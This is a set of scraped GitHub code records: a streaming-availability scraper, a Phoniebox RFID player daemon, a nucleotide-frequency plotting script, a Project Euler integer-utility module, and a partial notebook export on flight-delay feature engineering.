urlparse.urlunparse(parsed)\r\n\r\n prime_site = requests.get(url, headers=_headers)\r\n prime_soup = BeautifulSoup(unicodedata.normalize(\"NFKD\", prime_site.content.decode(\"utf-8\"))\r\n .replace(\"\", \"\"), 'html.parser')\r\n\r\n logo = prime_soup.find_all('img', class_='_1GFTRr')\r\n if len(logo) > 0 and \"primeLogo\" in logo[0].attrs[\"src\"]:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n with open(\"movies.txt\", \"r\", encoding=\"utf-8\") as file:\r\n _movie_txt = file.read().splitlines(keepends=False)\r\n\r\n if os.path.exists(\"movies.json\"):\r\n with open(\"movies.json\", \"r\", encoding=\"utf-8\") as file:\r\n _movie_list = json.load(file)\r\n else:\r\n _movie_list = {}\r\n\r\n _country = get_country()\r\n\r\n for _movie in _movie_txt:\r\n _search_obj = re.search(r'\\\\/--(?P.+)--\\\\/', _movie)\r\n if _search_obj is not None:\r\n _movie_list[_search_obj.group(1)] = None # shitty implementation...not good practice\r\n elif _movie != '':\r\n print(_movie)\r\n _movie_services = get_services(_movie)\r\n _subscription = 
list(filter(lambda f: _movie_services[f][0] is None, _movie_services.keys()))\r\n\r\n if 'Amazon Prime Video' in _movie_services and 'Amazon Prime Video' not in _subscription:\r\n if is_prime(_movie_services['Amazon Prime Video'][1]):\r\n _subscription.append('Amazon Prime Video')\r\n\r\n if _movie not in _movie_list:\r\n _movie_list[_movie] = {}\r\n _movie_list[_movie][_country] = _subscription\r\n\r\n with open(\"movies.json\", \"w\", encoding=\"utf-8\") as file:\r\n json.dump(_movie_list, file, indent=\"\\t\", ensure_ascii=False)\r\n","repo_name":"TKFRvisionOfficial/streaming-service-searcher","sub_path":"search_for_service.py","file_name":"search_for_service.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41573486321","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n#import threading\nimport sys, os.path\nimport signal\nfrom Phoniebox import Phoniebox\nfrom time import sleep,time\n\n# get absolute path of this script\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndefaultconfigFilePath = os.path.join(dir_path,'phoniebox.conf')\n\n# watchdog blocks the script, so it cannot be used in the same file as the PhonieboxDaemon\n#from watchdog.observers import Observer\n#from watchdog.events import FileSystemEventHandler\n#from os.path import dirname\n\n#class FileModifiedHandler(FileSystemEventHandler):\n\n# \"\"\" watch the given file for changes and execute callback function on modification \"\"\"\n# def __init__(self, file_path, callback):\n# self.file_path = file_path\n# self.callback = callback\n\n# # set observer to watch for changes in the directory\n# self.observer = Observer()\n# self.observer.schedule(self, dirname(file_path), recursive=False)\n# self.observer.start()\n# try:\n# while True:\n# sleep(1)\n# except KeyboardInterrupt:\n# self.observer.stop()\n# self.observer.join()\n# \n# def on_modified(self, event): \n# # only act on the change that we're looking for\n# if not event.is_directory and event.src_path.endswith(self.file_path):\n# daemon.log(\"cardAssignmentsFile modified!\",3)\n# self.callback() # call callback\n\n\nclass PhonieboxDaemon(Phoniebox):\n \"\"\" This subclass of Phoniebox is to be called directly, running as RFID reader daemon \"\"\"\n\n def __init__(self,configFilePath=defaultconfigFilePath):\n Phoniebox.__init__(self,configFilePath)\n self.lastplayedID = 0\n\n def run(self):\n # do things if killed\n signal.signal(signal.SIGINT, self.signal_handler)\n signal.signal(signal.SIGTERM, self.signal_handler)\n\n # establish mpd connection\n self.mpd_init_connection()\n self.mpd_init_settings()\n state = self.client.status()[\"state\"]\n\n daemon.play_alsa(daemon.get_setting(\"phoniebox\",'startup_sound'))\n if state == \"play\":\n self.client.play()\n\n # launch watcher for config files, blocks the script\n # TODO: it would be better to watch the changes with a second process that\n # tells the PhonieboxDaemon to reload the config whenever needed.\n\n #card_assignments_file = daemon.get_setting(\"phoniebox\",\"card_assignments_file\")\n #cardAssignmentsWatchdog = FileModifiedHandler(card_assignments_file, self.update_cardAssignments)\n #ConfigWatchdog = FileModifiedHandler(configFilePath, self.read_config)\n\n# # start_reader runs an endless loop, nothing will be executed afterwards\n daemon.start_reader()\n\n def start_reader(self):\n from Reader import Reader\n reader = Reader()\n\n card_detection_sound = 
self.get_setting(\"phoniebox\",\"card_detection_sound\")\n debounce_time = self.get_setting(\"phoniebox\",\"debounce_time\")\n if debounce_time == -1:\n debounce_time = 0.5\n second_swipe_delay = self.get_setting(\"phoniebox\",\"second_swipe_delay\")\n if second_swipe_delay == -1:\n second_swipe_delay = 0\n store_card_assignments = self.get_setting(\"phoniebox\",\"store_card_assignments\")\n if store_card_assignments == -1:\n store_card_assignments = 30\n last_swipe = 0\n last_write_card_assignments = 0\n\n while True:\n # reading the card id\n cardid = reader.reader.readCard()\n# cardid = None\n# sleep(debounce_time)\n try:\n # start the player script and pass on the cardid\n if cardid != None:\n print(\"Card ID: {}\".format(int(cardid)))\n filename = self.get_setting(\"phoniebox\",\"Latest_RFID_file\")\n if filename != -1:\n self.print_to_file(filename,\"\\'{}\\' was used at {}\".format(cardid,time()))\n if card_detection_sound != -1:\n self.play_alsa(card_detection_sound)\n if cardid in self.cardAssignments.sections():\n # second swipe detection\n if int(cardid) == int(self.lastplayedID) and time()-last_swipe > second_swipe_delay:\n self.log(\"Second swipe for {}\".format(cardid),3)\n self.do_second_swipe()\n # if first swipe, just play\n else:\n last_swipe = time()\n self.do_start_playlist(cardid)\n # do not react for debounce_time\n sleep(debounce_time)\n else:\n self.log(\"Card with ID {} not mapped yet.\".format(cardid),1)\n\n except OSError as e:\n print(\"Execution failed:\")\n\n # check if it is time for the next update of the cardAssignments and do it\n # Note: this is purely time-based and not clever at all. Find a\n # TODO: find a better way to check for changes in the files on disk to trigger the update\n if time()-last_write_card_assignments > store_card_assignments and store_card_assignments != False:\n # store card assignments\n if self.get_setting(\"phoniebox\",\"translate_legacy_cardassignments\",\"bool\") == True:\n legacy_cardAssignments = self.translate_legacy_cardAssignments(last_write_card_assignments)\n self.update_cardAssignments(legacy_cardAssignments)\n else:\n self.update_cardAssignments(self.read_cardAssignments)\n\n self.write_new_cardAssignments()\n last_write_card_assignments = time()\n\n def signal_handler(self,signal,frame):\n \"\"\" catches signal and triggers the graceful exit \"\"\"\n print(\"Caught signal {}, exiting...\".format(signal))\n self.exit_gracefully()\n\n def exit_gracefully(self):\n \"\"\" stop mpd and write cardAssignments to disk if daemon is stopped \"\"\"\n self.mpd_connect_timeout()\n self.client.stop()\n self.client.disconnect()\n # write config to update playstate\n self.write_new_cardAssignments()\n\n # exit script\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n\n # if called directly, launch Phoniebox.py as rfid-reader daemon\n # treat the first argument as defaultconfigFilePath if given\n if len(sys.argv)<=1:\n configFilePath = defaultconfigFilePath\n else:\n configFilePath = sys.argv[1]\n\n daemon = PhonieboxDaemon(configFilePath)\n\n # setup the signal listeners\n signal.signal(signal.SIGINT, daemon.exit_gracefully)\n signal.signal(signal.SIGTERM, daemon.exit_gracefully)\n\n # start the daemon (blocking)\n daemon.run()\n\n","repo_name":"JoeyRamone/J4KTest","sub_path":"scripts/python-phoniebox/PhonieboxDaemon.py","file_name":"PhonieboxDaemon.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} 
+{"seq_id":"29547034246","text":"\"\"\"Calculate nucleotide frequencies in alignments.\"\"\"\n\nimport os\nimport re\n\nimport matplotlib.pyplot as plt\nfrom src.utils import read_fasta\n\n\ndef grouped_bar(groups, group_width, bar_width, file_label, bar_labels=None, bar_colors=None):\n group_labels = sorted(groups)\n if bar_labels is None:\n bar_labels = list({bar_label for group in groups.values() for bar_label in group})\n if bar_colors is None:\n bar_colors = [f'C{i%10}' for i in range(len(bar_labels))]\n\n xs = [i * group_width for i in range(len(groups))]\n lim = len(bar_labels) // 2\n shift = 0 if len(bar_labels) % 2 == 1 else 0.5\n dxs = [bar_width * (x + shift) for x in range(-lim, len(bar_labels) - lim)]\n\n plt.figure(figsize=(8, 4))\n for dx, bar_label, bar_color in zip(dxs, bar_labels, bar_colors):\n plt.bar([x + dx for x in xs], [groups[group_label].get(bar_label, 0) for group_label in group_labels],\n width=bar_width, color=bar_color, label=bar_label)\n plt.xticks(xs, group_labels, rotation=60, fontsize='small')\n plt.xlabel('Species')\n plt.ylabel('Frequency')\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), prop={'size': 'small'})\n plt.subplots_adjust(bottom=0.2, left=0.1, right=0.9)\n plt.savefig(f'out/{file_label}.png')\n plt.close()\n\n\nspid_regex = r'spid=([a-z]+)'\n\n# Count nucleotides\ncounts = {}\nfor path in [path for path in os.listdir('../align_AA2NT/out/') if path.endswith('.afa')]:\n msa = read_fasta(f'../align_AA2NT/out/{path}')\n for header, seq in msa:\n spid = re.search(spid_regex, header).group(1)\n for sym in seq:\n if sym != '-':\n try:\n counts[spid][sym] = counts[spid].get(sym, 0) + 1\n except KeyError:\n counts[spid] = {sym: 1}\n\nif not os.path.exists('out/'):\n os.mkdir('out/')\n\n# Plot nucleotide frequencies\nfreqs = {}\nfor spid, count in counts.items():\n total = sum(count.values())\n freqs[spid] = {sym: num / total for sym, num in count.items()}\n\ngrouped_bar(freqs, 1.5, 0.25, 'nt_freqs', ['A', 'T', 'G', 'C'], ['C0', 'C1', 'C3', 'C2'])\n\n# Plot AT/GC frequencies\nATGCs = {}\nfor spid, freq in freqs.items():\n ATGCs[spid] = {'AT': freq['A'] + freq['T'], 'GC': freq['G'] + freq['C']}\n\ngrouped_bar(ATGCs, 1, 0.3, 'ATGC_freqs', ['AT', 'GC'])\n\n\"\"\"\nDEPENDENCIES\n../align_AA2NT/align_AA2NT.py\n ../align_AA2NT/out/*.afa\n\"\"\"","repo_name":"marcsingleton/orthology_inference2023","sub_path":"analysis/ortho_tree/NT_freqs/NT_freqs.py","file_name":"NT_freqs.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"12856808273","text":"def IsEven(inter):\n\tif inter %2==0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef Divides(n, k):\n\tif n %k == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef Product(Array):\n\tProd = 1\n\tfor n in Array:\n\t\tProd = Prod *n\n\treturn Prod\n\n\ndef HasFactor(n, factorList):\n\tfor k in factorList:\n\t\tif n % k == 0:\n\t\t\treturn True\n\treturn False\n\n\ndef nCr(n, r):\n\tif n<=r:\n\t\treturn 1\n\telse:\n\t\ttop = 1\n\t\tbot = 1\n\t\tr = min(r, n -r)\n\t\tfor i in range(n -r):\n\t\t\ttop = top *(n -i)\n\t\t\tbot = bot *(n -r -i)\n\treturn int(top /bot)\n\n\ndef MakePrimes(Maximum, primes=[2]):\n\tif Maximum<=2:\n\t\treturn [2]\n\n\tfrom math import ceil\n\n\tdef PrimeFactor(n, PrimesList):\n\t\tHalfWay = ceil(n**.5)\n\t\tfor k in PrimesList:\n\t\t\tif k > HalfWay:\n\t\t\t\treturn False\n\t\t\tif n % k == 0:\n\t\t\t\treturn True\n\t\treturn False\n\n\tfor i in range(max(primes) +1, Maximum 
+1):\n\t\tif PrimeFactor(i, primes):\n\t\t\tcontinue\n\t\telse:\n\t\t\tprimes.append(i)\n\treturn primes\n\n\ndef DigitCount(Integer):\n\treturn len(str(Integer))\n\n\ndef IsPalindrome(Integer):\n\tSTR = str(Integer)\n\tfor i in range(len(STR)):\n\t\tif STR[i] != STR[len(STR) -1 -i]:\n\t\t\treturn False\n\treturn True\n\n\ndef ModMult(a, b, M):\n\tA = a %M\n\tB = b %M\n\treturn ((A *B) %M)\n\n\ndef Obvs(Integer, ind=0):\n\tSTR=set(str(Integer)[ind:])\n\tif set.intersection(set([\"2\", \"4\", \"5\", \"6\", \"8\", \"0\"]), STR)!=set([]):\n\t\treturn True\n\treturn False\n\n\ndef Factorial(Integer):\n\tResult = 1\n\tfor k in range(1, Integer +1):\n\t\tResult = Result * k\n\treturn Result\n\n\ndef Triangular(Integer):\n\treturn int(Integer *(Integer +1) /2)\n\n\ndef Pyramidal(Integer):\n\treturn int(Integer *(Integer +1) *(2 *Integer +1) /6)\n\n\ndef Pentagonal(Integer):\n\treturn int(Integer *(3 *Integer -1) /2)\n\n\ndef Hexagonal(Integer):\n\treturn int(Integer *(2 *Integer -1))\n\n\ndef isSquare(Integer):\n\treturn (abs(Integer)**.5 %1==0)\n\n\ndef isTriangular(Integer):\n\treturn isSquare(8 *Integer +1)\n\n\ndef isPentagonal(Integer):\n\tif not isSquare(24 *Integer + 1):\n\t\treturn False\n\telif ((int((24 *Integer +1)**.5) +1) %6!=0):\n\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef isHexagonal(Integer):\n\tif not isSquare(8 *Integer +1):\n\t\treturn False\n\telif (int((8 *Integer +1)**.5) +1) %4!=0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef IsPythagorean(a, b, c):\n\treturn a**2 +b**2 == c**2\n\n\ndef PySumTo(Integer):\n\tfrom math import floor\n\ta=1\n\tb=1\n\tc=Integer -2\n\tTriples = []\n\tMinimum = int(floor(Integer /3))\n\twhile c > Minimum:\n\t\tif IsPythagorean(a, b, c):\n\t\t\tTriples.append([a, b, c])\n\t\tc = c -1\n\t\tb = b +1\n\t\tif b>=c:\n\t\t\tb=a +1\n\t\t\ta=a +1\n\t\t\tc=Integer -a -b\n\treturn(Triples)\n\n\ndef FactorsOf(Integer):\n\tFactors = []\n\tMaximum = Integer**.5\n\ti = 1\n\twhile True:\n\t\tif i > Maximum:\n\t\t\tbreak\n\t\tif Integer % i==0:\n\t\t\tFactors.append(i)\n\t\t\tif i != int(Integer / i):\n\t\t\t\tFactors.append(int(Integer / i))\n\t\ti = i +1\n\treturn sorted(Factors)\n\n\ndef SmallestCommonFactor(a, b):\n\tdef FactorsOf(Integer):\n\t\tFactors = []\n\t\tMaximum = Integer**.5\n\t\ti = 1\n\t\twhile True:\n\t\t\tif i > Maximum:\n\t\t\t\tbreak\n\t\t\tif Integer % i==0:\n\t\t\t\tFactors.append(i)\n\t\t\t\tif i != int(Integer / i):\n\t\t\t\t\tFactors.append(int(Integer / i))\n\t\t\ti = i +1\n\t\treturn sorted(Factors)\n\n\tFactors = FactorsOf(abs(min(a, b)))[1:]\n\tMax = abs(max(a, b))\n\t# ignore the fact that 1 divides a,b (the [1:] above already drops it)\n\tfor k in Factors:\n\t\tif Max % k == 0:\n\t\t\treturn k\n\treturn False\n\n\ndef HighestCommonFactor(a, b):\n\tdef FactorsOf(Integer):\n\t\tif Integer ==1:\n\t\t\treturn [1]\n\t\tFactors = []\n\t\tMaximum = Integer**.5\n\t\ti = 1\n\t\twhile True:\n\t\t\tif i > Maximum:\n\t\t\t\tbreak\n\t\t\tif Integer % i==0:\n\t\t\t\tFactors.append(i)\n\t\t\t\tif i != int(Integer / i):\n\t\t\t\t\tFactors.append(int(Integer / i))\n\t\t\ti = i +1\n\t\treturn sorted(Factors)\n\tFactors = reversed(FactorsOf(abs(min(a, b))))\n\tMax = abs(max(a, b))\n\t# not excluding 1, as this is always a possible factor\n\tfor k in Factors:\n\t\tif Max % k == 0:\n\t\t\treturn k\n\treturn False\n\n\ndef BiggestCoin(Value, Coins=[200, 100, 50, 20, 10, 5, 2, 1]):\n\tHead = Coins[0]\n\tTail = Coins[1:]\n\tSum = 0\n\tLoopCount = Value //Head\n\tif Tail !=[]:\n\t\tfor t in range(0, LoopCount +1):\n\t\t\tSum = Sum + BiggestCoin(Value - (t *Head), 
Tail)\n\t\treturn Sum\n\treturn int(Value % Head==0)\n\n\ndef PairSum(RowSum, MaxInd=False, Reversed=False):\n\tif not MaxInd:\n\t\tMaxInd = [RowSum +1, RowSum +1]\n\tfor k in range(0, RowSum +1):\n\t\ty = RowSum -k\n\t\tx = k\n\t\tif (x >= MaxInd[0]) or (y >= MaxInd[1]):\n\t\t\tcontinue\n\t\tyield (y, x)\n\n\n\ndef PanCheck(n, q=9):\n\tSTR = str(n)\n\tif len(STR)!=q:\n\t\treturn False\n\tDigits = set(STR)\n\tif len(Digits)!=q:\n\t\treturn False\n\tif Digits!=set([str(i) for i in range(1, q +1)]):\n\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef IntReverse(Integer):\n\treturn intStrAdd(reversed(str(Integer)))\n\n\ndef intStrAdd(Array):\n\tSTR = \"\"\n\tfor n in Array:\n\t\tSTR = STR +str(n)\n\treturn int(STR)\n\n\ndef isPrime(n, primes=None):\n\tfrom functions.Integer import MakePrimes\n\tfrom functions.Integer import HasFactor\n\tfrom math import ceil\n\n\tif primes is None:\n\t\tprimes = [2]\t# avoid a shared mutable default argument\n\n\tif n<=1:\n\t\treturn False, primes\n\n\tif n in primes:\n\t\treturn True, primes\n\telif n < max(primes):\n\t\treturn False, primes\n\telif HasFactor(n, primes):\n\t\treturn False, primes\n\telse:\n\t\tprimes = MakePrimes(ceil(n**.5), primes)\n\t\tif HasFactor(n, primes):\n\t\t\treturn False, primes\n\t\telse:\n\t\t\treturn True, primes\n\n\ndef CollatzSequence(Integer):\n\tdef ColatzStep(Integer):\n\t\tif Integer % 2==0:\n\t\t\treturn Integer /2\n\t\telse:\n\t\t\treturn 3 * Integer +1\n\tSequence = [Integer]\n\twhile True:\n\t\tif Integer <=1:\n\t\t\tbreak\n\t\telse:\n\t\t\tInteger = ColatzStep(Integer)\n\t\t\tSequence.append(int(Integer))\n\treturn Sequence\n\n\ndef CheckedCollatzSequence(Integer, Checked={1: 1}):\n\t# NOTE: the mutable default dict persists across calls and acts as a memo cache\n\n\tdef ColatzStep(Integer):\n\t\tif Integer % 2 == 0:\n\t\t\treturn int(Integer /2)\n\t\telse:\n\t\t\treturn 3 * Integer +1\n\n\n\tdef CollatzAddSeq(seq, Checked):\n\t\tCurrentValue = 1\n\t\tfor n in reversed(seq):\n\t\t\tif n in Checked:\n\t\t\t\tif type(Checked[n]) is int:\n\t\t\t\t\tCurrentValue = Checked[n]\n\t\t\t\telse:\n\t\t\t\t\tChecked[n] = CurrentValue\n\t\t\telse:\n\t\t\t\tChecked[n] = CurrentValue\n\t\t\tCurrentValue = CurrentValue +1\n\n\tSequence = [Integer]\n\twhile True:\n\t\tif Integer <=1:\n\t\t\tbreak\n\t\telse:\n\t\t\tif Integer in Checked.keys():\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tChecked[Integer] = True\n\t\t\tInteger = ColatzStep(Integer)\n\t\t\tSequence.append(int(Integer))\n\tCollatzAddSeq(seq=Sequence, Checked=Checked)\n\treturn Checked\n\n\ndef GetAmicable(Integer):\n\treturn sum(FactorsOf(Integer)) -Integer\n\n\ndef IsAmicable(Integer):\n\tFlip = sum(FactorsOf(Integer)) -Integer\n\tFlop = sum(FactorsOf(Flip)) -Flip\n\treturn (Flop == Integer and Flip != Flop)\n\n\ndef IsPerfect(Integer):\n\treturn (Integer == sum(FactorsOf(Integer)) -Integer)\n\n\ndef IsAbundant(Integer):\n\treturn (sum(FactorsOf(Integer))>2 *Integer)\n\n\ndef IsDeficient(Integer):\n\treturn (sum(FactorsOf(Integer))<2 *Integer)\n\n\ndef isNonRepeating(Integer):\n\tif(Integer %2!=0 and Integer %5!=0):\n\t\treturn False\n\telse:\n\t\tk = Integer\n\t\twhile True:\n\t\t\tif k %5==0:\n\t\t\t\tk = int(k /5)\n\t\t\telse:\n\t\t\t\tbreak\n\t\twhile True:\n\t\t\tif k %2==0:\n\t\t\t\tk = int(k /2)\n\t\t\telse:\n\t\t\t\tbreak\n\t\tif k == 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n","repo_name":"mathematicalninja/Euler","sub_path":"MiniFunctions/Python/Integer.py","file_name":"Integer.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
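# Illustrative sanity checks for the Integer.py helpers above (hand-checked
# values; assumes the module is importable as functions.Integer, as its own
# internal imports suggest):
from functions.Integer import Triangular, isTriangular, nCr, MakePrimes, IsPerfect

assert Triangular(4) == 10 and isTriangular(10)
assert nCr(5, 2) == 10  # 5 choose 2
assert MakePrimes(20) == [2, 3, 5, 7, 11, 13, 17, 19]
assert IsPerfect(28)  # proper divisors 1 + 2 + 4 + 7 + 14 == 28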
+{"seq_id":"10027052008","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom datetime import timedelta\nfrom itertools import product\nimport datetime\nimport seaborn as sns\nimport random\nimport lightgbm as lgb\nimport re\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import mean_squared_error, f1_score\nget_ipython().run_line_magic('matplotlib', 'notebook')\n\n\ndef display_all(df):\n with pd.option_context(\"display.max_rows\", 1000, \"display.max_columns\", 1000): \n display(df)\n \ndef rmse(y_true, y_pred):\n return np.sqrt(mean_squared_error(y_true, y_pred))\n\ndef evalerror(preds, dtrain):\n labels = dtrain.get_label()\n return 'rmse_', rmse(labels, preds) , False\n\n\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn.preprocessing import LabelEncoder, Imputer, StandardScaler\nfrom pandas.api.types import is_string_dtype, is_numeric_dtype, is_categorical_dtype\nfrom sklearn.ensemble import forest\nfrom sklearn.tree import export_graphviz\n\n\ndef add_datepart(df, fldname, drop=True, time=False, errors=\"raise\"):\t\n \"\"\"add_datepart converts a column of df from a datetime64 to many columns containing\n the information from the date. This applies changes inplace.\n Parameters:\n -----------\n df: A pandas data frame. df gain several new columns.\n fldname: A string that is the name of the date column you wish to expand.\n If it is not a datetime64 series, it will be converted to one with pd.to_datetime.\n drop: If true then the original date column will be removed.\n time: If true time features: Hour, Minute, Second will be added.\n Examples:\n ---------\n >>> df = pd.DataFrame({ 'A' : pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000'], infer_datetime_format=False) })\n >>> df\n A\n 0 2000-03-11\n 1 2000-03-12\n 2 2000-03-13\n >>> add_datepart(df, 'A')\n >>> df\n AYear AMonth AWeek ADay ADayofweek ADayofyear AIs_month_end AIs_month_start AIs_quarter_end AIs_quarter_start AIs_year_end AIs_year_start AElapsed\n 0 2000 3 10 11 5 71 False False False False False False 952732800\n 1 2000 3 10 12 6 72 False False False False False False 952819200\n 2 2000 3 11 13 0 73 False False False False False False 952905600\n \"\"\"\n fld = df[fldname]\n fld_dtype = fld.dtype\n if isinstance(fld_dtype, pd.core.dtypes.dtypes.DatetimeTZDtype):\n fld_dtype = np.datetime64\n\n if not np.issubdtype(fld_dtype, np.datetime64):\n df[fldname] = fld = pd.to_datetime(fld, infer_datetime_format=True, errors=errors)\n targ_pre = re.sub('[Dd]ate$', '', fldname)\n attr = ['Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear',\n 'Is_month_end', 'Is_month_start', 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start']\n if time: attr = attr + ['Hour', 'Minute', 'Second']\n for n in attr: df[targ_pre + n] = getattr(fld.dt, n.lower())\n df[targ_pre + 'Elapsed'] = fld.astype(np.int64) // 10 ** 9\n if drop: df.drop(fldname, axis=1, inplace=True)\n\ndef train_cats(df):\n \"\"\"Change any columns of strings in a panda's dataframe to a column of\n categorical values. This applies the changes inplace.\n Parameters:\n -----------\n df: A pandas dataframe. 
Any columns of strings will be changed to\n categorical values.\n Examples:\n ---------\n >>> df = pd.DataFrame({'col1' : [1, 2, 3], 'col2' : ['a', 'b', 'a']})\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n note the type of col2 is string\n >>> train_cats(df)\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n now the type of col2 is category\n \"\"\"\n for n,c in df.items():\n if is_string_dtype(c): df[n] = c.astype('category').cat.as_ordered()\n\n\n\ndef proc_df(df, y_fld=None, skip_flds=None, ignore_flds=None, do_scale=False, na_dict=None,\n preproc_fn=None, max_n_cat=None, subset=None, mapper=None):\n \"\"\" proc_df takes a data frame df and splits off the response variable, and\n changes the df into an entirely numeric dataframe. For each column of df \n which is not in skip_flds nor in ignore_flds, na values are replaced by the\n median value of the column.\n Parameters:\n -----------\n df: The data frame you wish to process.\n y_fld: The name of the response variable\n skip_flds: A list of fields that dropped from df.\n ignore_flds: A list of fields that are ignored during processing.\n do_scale: Standardizes each column in df. Takes Boolean Values(True,False)\n na_dict: a dictionary of na columns to add. Na columns are also added if there\n are any missing values.\n preproc_fn: A function that gets applied to df.\n max_n_cat: The maximum number of categories to break into dummy values, instead\n of integer codes.\n subset: Takes a random subset of size subset from df.\n mapper: If do_scale is set as True, the mapper variable\n calculates the values used for scaling of variables during training time (mean and standard deviation).\n Returns:\n --------\n [x, y, nas, mapper(optional)]:\n x: x is the transformed version of df. x will not have the response variable\n and is entirely numeric.\n y: y is the response variable\n nas: returns a dictionary of which nas it created, and the associated median.\n mapper: A DataFrameMapper which stores the mean and standard deviation of the corresponding continuous\n variables which is then used for scaling of during test-time.\n Examples:\n ---------\n >>> df = pd.DataFrame({'col1' : [1, 2, 3], 'col2' : ['a', 'b', 'a']})\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n note the type of col2 is string\n >>> train_cats(df)\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n now the type of col2 is category { a : 1, b : 2}\n >>> x, y, nas = proc_df(df, 'col1')\n >>> x\n col2\n 0 1\n 1 2\n 2 1\n >>> data = DataFrame(pet=[\"cat\", \"dog\", \"dog\", \"fish\", \"cat\", \"dog\", \"cat\", \"fish\"],\n children=[4., 6, 3, 3, 2, 3, 5, 4],\n salary=[90, 24, 44, 27, 32, 59, 36, 27])\n >>> mapper = DataFrameMapper([(:pet, LabelBinarizer()),\n ([:children], StandardScaler())])\n >>>round(fit_transform!(mapper, copy(data)), 2)\n 8x4 Array{Float64,2}:\n 1.0 0.0 0.0 0.21\n 0.0 1.0 0.0 1.88\n 0.0 1.0 0.0 -0.63\n 0.0 0.0 1.0 -0.63\n 1.0 0.0 0.0 -1.46\n 0.0 1.0 0.0 -0.63\n 1.0 0.0 0.0 1.04\n 0.0 0.0 1.0 0.21\n \"\"\"\n if not ignore_flds: ignore_flds=[]\n if not skip_flds: skip_flds=[]\n if subset: df = get_sample(df,subset)\n else: df = df.copy()\n ignored_flds = df.loc[:, ignore_flds]\n df.drop(ignore_flds, axis=1, inplace=True)\n if preproc_fn: preproc_fn(df)\n if y_fld is None: y = None\n else:\n if not is_numeric_dtype(df[y_fld]): df[y_fld] = pd.Categorical(df[y_fld]).codes\n y = df[y_fld].values\n skip_flds += [y_fld]\n df.drop(skip_flds, axis=1, inplace=True)\n\n if na_dict is None: na_dict = {}\n else: na_dict = na_dict.copy()\n na_dict_initial = na_dict.copy()\n for n,c 
in df.items(): na_dict = fix_missing(df, c, n, na_dict)\n    if len(na_dict_initial.keys()) > 0:\n        df.drop([a + '_na' for a in list(set(na_dict.keys()) - set(na_dict_initial.keys()))], axis=1, inplace=True)\n    if do_scale: mapper = scale_vars(df, mapper)\n    for n,c in df.items(): numericalize(df, c, n, max_n_cat)\n    df = pd.get_dummies(df, dummy_na=True)\n    df = pd.concat([ignored_flds, df], axis=1)\n    res = [df, y, na_dict]\n    if do_scale: res = res + [mapper]\n    return res\n\n# NOTE: fix_missing, scale_vars, numericalize and get_sample used above are\n# helpers from the old fastai (0.7) structured-data module and are not defined\n# in this file.\n\n\n\n\n# 3. Feature Engineering\n\n# 3-1. Adding Datetime Features\n\njj['time'] = pd.to_datetime(jj['time'])\n\n\njj['scheduled_dep'] = jj['scheduled_dep'].apply(lambda x: int(str(x).split(':')[0])*60 + int(str(x).split(':')[1]))\n\n\nadd_datepart(jj, 'date', drop=False)\njj[['Is_month_end','Is_month_start','Is_quarter_end','Is_quarter_start']] = jj[['Is_month_end','Is_month_start','Is_quarter_end','Is_quarter_start']].astype(np.int8)\n\n\n# 3-2. Adding weather '_bet' Features\n\n# Adding the mean values of weather columns of departure city and destination city as new features\n\nhourly_wea_cols = [c[:-4] for c in list(jj) if 'des' in c]\n\n\nfor col in hourly_wea_cols:\n    jj[col + '_bet'] = (jj[col + '_dep'] + jj[col + '_des']) / 2\n\n\n# 3-3. Setting Target\n\n# I set target = 1 for observations that meet these criteria.\n# 1. Delayed for more than an hour\n# 2. Delayed for specific weather reasons (need to be updated)\n\ndf = jj.copy()\n\n\n# Korean categorical labels from the raw data: weather, weather-other, lightning,\n# snow, wind, rain, visibility, cloud ceiling, typhoon, en-route weather, de-icing\nweather_reason = ['기상', '기상-기타', '기상-뇌전', '기상-눈', '기상-바람', '기상-비',\n               '기상-시정', '기상-운고', '기상-태풍', '기상-항로', '제방빙작업']\n\ndf['target'] = 0\ndf.loc[(df['delay_time'] > 60)&(df['reason'].isin(weather_reason)), 'target'] = 1\n\n\ndf['target'].value_counts()\n\n\ndf.drop(['dep_loc', 'real_dep', 'status', 'reason', 'type'], 1, inplace=True)\n\n\n# 3-4. Feature Correlation\n\ncorr_matrix = df.corr().abs()\n\n\ncorr_df = corr_matrix.unstack().sort_values(kind='quicksort').reset_index()\ncorr_df = corr_df[corr_df['level_0'] != corr_df['level_1']].dropna()\n\n\ncorr_df.sort_values(by=0, ascending=False).drop_duplicates(subset=[0]).head(10)\n\n\n# Select upper triangle of correlation matrix\nupper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k = 1).astype(np.bool))\n\n# Find index of feature columns with correlation greater than 0.95\nto_drop = [col for col in upper.columns if any(upper[col] > 0.95)]\n\n# Drop features\ndf.drop(to_drop, axis = 1, inplace=True)\n\n\n# 4. 